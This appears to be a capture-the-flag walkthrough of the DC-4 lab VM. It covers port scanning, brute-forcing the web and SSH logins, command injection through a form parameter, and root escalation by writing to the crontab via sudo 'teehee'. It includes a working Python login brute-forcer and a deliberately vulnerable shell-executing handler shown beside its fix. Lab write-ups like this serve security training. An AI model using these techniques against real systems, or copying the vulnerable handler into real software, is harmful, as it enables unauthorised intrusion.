By bikupothen1615

# DC-4


DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. Unlike the previous DC releases, this one is designed primarily for beginners/intermediates. There is only one flag, but technically, multiple entry points and just like last time, no clues. Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.


DC-4 is a VirtualBox VM built on Debian 32 bit, so there should be no issues running it on most PCs. If there are any issues running this VM in VMware, have a read through of this. It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.


Installation is simple - download it, unzip it, and then import it into VirtualBox and away you go. While there should be no problems using this VM, by downloading it, you accept full responsibility for any unintentional damage that this VM may cause. In saying that, there shouldn't be any problems, but I feel the need to throw this out there just in case.

The machine is available at the following domain:


We start our hunting with an nmap scan.

The port scan found two open ports, 22 (SSH) and 80 (HTTP). To find hidden directories we ran a directory scan with gobuster.

The scans didn't turn up much, so we simply opened the website.

It presented an admin login page. We guessed that the username is the default admin and used Burp Suite (Intruder) with a password wordlist as the payload to brute-force the login; the password turned out to be happy. We logged in with these credentials.
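The Burp Suite Intruder step above is just "send every candidate password and watch for the one response that looks different". The following is an added example, not code from this post or from the DC-4 machine, that does the same thing in Python: it POSTs each password to the login form and reports the first one whose response differs from a known-bad baseline. The login path and the field names username and password are assumptions, and the transport is a plain callable so the logic runs offline against the constructed fake target at the bottom.

```python
"""Added example (not code from the original post). A minimal login
brute-forcer that mirrors the Burp Suite Intruder run: POST each candidate
password and report the first one whose response differs from a known-bad
baseline. The login path and the 'username'/'password' field names are
assumptions, not taken from DC-4."""
from dataclasses import dataclass
from typing import Callable, Iterable, Optional
from urllib.parse import urlencode
import urllib.error
import urllib.request


@dataclass
class Response:
    status: int
    body: bytes
    location: Optional[str] = None  # Location header, if the server redirected


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Keep 302s visible: a redirect after login is usually the success signal."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_post(url: str, fields: dict) -> Response:
    """Real transport: form-encoded POST that does not follow redirects."""
    req = urllib.request.Request(url, data=urlencode(fields).encode())
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(req, timeout=10) as r:
            return Response(r.status, r.read(), r.headers.get("Location"))
    except urllib.error.HTTPError as e:  # 3xx/4xx/5xx all land here with _NoRedirect
        return Response(e.code, e.read(), e.headers.get("Location"))


def differs(a: Response, b: Response) -> bool:
    """Success heuristic: status code, redirect target or body length changed."""
    return (a.status, a.location, len(a.body)) != (b.status, b.location, len(b.body))


def brute_force_login(url: str, username: str, passwords: Iterable[str],
                      post: Callable[[str, dict], Response] = http_post,
                      baseline_password: str = "definitely-not-the-password") -> Optional[str]:
    """Return the first password whose response differs from the baseline, else None."""
    baseline = post(url, {"username": username, "password": baseline_password})
    for pw in passwords:
        if differs(post(url, {"username": username, "password": pw}), baseline):
            return pw
    return None


# --- constructed offline stand-in for the target, so the code runs without the lab ---
def fake_target_post(url: str, fields: dict) -> Response:
    """Behaves like a typical PHP login page: 302 on success, 200 plus error text otherwise."""
    if fields.get("username") == "admin" and fields.get("password") == "happy":
        return Response(302, b"", "command.php")
    return Response(200, b"<html><body>Login failed</body></html>")


SAMPLE_WORDLIST = ["password", "123456", "admin", "happy", "letmein"]  # constructed sample

if __name__ == "__main__":
    print(brute_force_login("http://target/login.php", "admin", SAMPLE_WORDLIST, post=fake_target_post))
```

The body-length comparison is the same signal Intruder's response-length column gives you, and it has the same weakness: a page that embeds a timestamp or a per-request CSRF token changes length on every request, so for those targets compare on a fixed marker string (or the redirect alone) instead. Swap `post=http_post` in to run it against a real form.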

Clicking the Command link took us to a page with three options. Each option redirected to another page showing either a list of files or information about disk space.



Looking at these requests in Burp Suite, we saw that the ls -l command itself is sent in the request as ls+-l (the space URL-encoded as +). In other words, the client tells the server which command to run.

So we modified the command in Burp Suite and resent the request to look for useful information.

Sending ls+/home returned three home directories: jim, charles and sam. Running ls+/home/jim next, we were lucky and found an entry named backups.
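What makes the ls+-l request exploitable is that the form parameter is the command, not the name of a command. Below is an added example, not the DC-4 application's own code (its handler is PHP and is not reproduced here), that models the flaw and its fix in Python: the vulnerable handler decodes the parameter and hands it to /bin/sh, so any command the client encodes gets run; the hardened handler keeps the same three radio buttons but maps a fixed token to a fixed argv list and never starts a shell. The parameter name radio and the token names are assumptions.

```python
"""Added example, not the DC-4 application's own code. Models the command
injection the walkthrough exploits (the form parameter is the command and
is run through a shell) next to an allowlisted handler that fixes it. The
parameter name 'radio' and the token names are assumptions."""
import subprocess
from urllib.parse import parse_qs, urlencode


def build_form_body(value: str) -> str:
    """Encode the form the way a browser (or Burp) sends it: spaces become '+'."""
    return urlencode({"radio": value, "submit": "Run"})


def run_command_vulnerable(body: str) -> str:
    """Flawed server side: the parameter *is* the command, run through /bin/sh."""
    cmd = parse_qs(body).get("radio", [""])[0]  # 'ls+-l' decodes back to 'ls -l'
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


# Hardened server side: the client only ever names a choice, never a command.
ALLOWED_COMMANDS = {
    "list": ["ls", "-l"],
    "usage": ["du", "-h"],
    "free": ["df", "-h"],
}


def is_allowed_choice(body: str) -> bool:
    """True only if the radio value is one of the fixed tokens."""
    return parse_qs(body).get("radio", [""])[0] in ALLOWED_COMMANDS


def run_command_hardened(body: str) -> str:
    """Look the token up, run the fixed argv without a shell, reject anything else."""
    choice = parse_qs(body).get("radio", [""])[0]
    if choice not in ALLOWED_COMMANDS:
        raise ValueError(f"unknown choice {choice!r}")
    return subprocess.run(ALLOWED_COMMANDS[choice], capture_output=True, text=True).stdout


if __name__ == "__main__":
    # What the walkthrough did: replace ls+-l with another command.
    print(run_command_vulnerable(build_form_body("ls /home")))
    # The same request against the hardened handler is rejected before anything runs.
    print(is_allowed_choice(build_form_body("ls /home")))
```

A quick triage check for this bug class when reviewing a request: if the parameter value reads like a command line (ls+-l, du+-h) rather than an opaque token, try a harmless substitution such as id and see whether the output changes. In the fixed version even a valid token never reaches a shell, so metacharacters like ; and | have nothing to act on.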


Inside backups we found old-passwords-bak, a file containing a list of passwords.

We copied these passwords into a wordlist and used hydra with it to brute-force the SSH password for user jim.

With jim's username and password we connected over SSH. Listing jim's home directory showed a file named mbox; reading it gave us a message saying that jim had received mail.

So we looked in /var/mail and found the email jim received. It was from Charles and contained his password.

We switched user to charles and ran sudo -l, which showed that charles can run teehee with sudo.

teehee behaves like tee, so with sudo it can append an attacker-chosen line to the system crontab as root. We used it to add a crontab entry that runs as root (cron picks up the change within about a minute), got root permissions from it, and read the root flag.

Pwned.!!!
